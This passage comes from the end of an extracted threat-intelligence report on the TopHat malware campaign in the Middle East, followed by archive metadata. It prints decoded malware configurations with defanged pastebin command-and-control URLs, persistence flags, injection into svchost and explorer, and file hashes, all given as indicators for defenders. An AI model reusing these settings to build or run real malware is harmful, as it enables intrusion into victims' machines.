[param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]ZVLhWo62[/install_name]\r\n  [nick_name]b04bc9mK[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\nd0f2d2d7d82c91fe64a64552e0e6200a096230fb6a64a1307928ae33ab2a5bf8\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 13 of 14\n\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n  [/connection]\r\n  [install_name]9OhcOo03[/install_name]\r\n  [nick_name]URt7b1zK[/nick_name]\r\n  [install_folder]temp[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]true[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n7b6347093b27174e27228c2fde7d39e02d57315b354461aaf1dee3f0800fdfc3\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n  [/connection]\r\n  [install_name]ke6Wox2L[/install_name]\r\n  [nick_name]3GlWhgi3[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]true[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]explorer[/injection_process]\r\nSource: https://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/"
	],
	"report_names": [
		"unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services"
	],
	"threat_actors": [],
	"ts_created_at": 1775434347,
	"ts_updated_at": 1775791196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d865976c95c90673e0517ca8f4ebfb0c386e593b.pdf",
		"text": "https://archive.orkl.eu/d865976c95c90673e0517ca8f4ebfb0c386e593b.txt",
		"img": "https://archive.orkl.eu/d865976c95c90673e0517ca8f4ebfb0c386e593b.jpg"
	}
}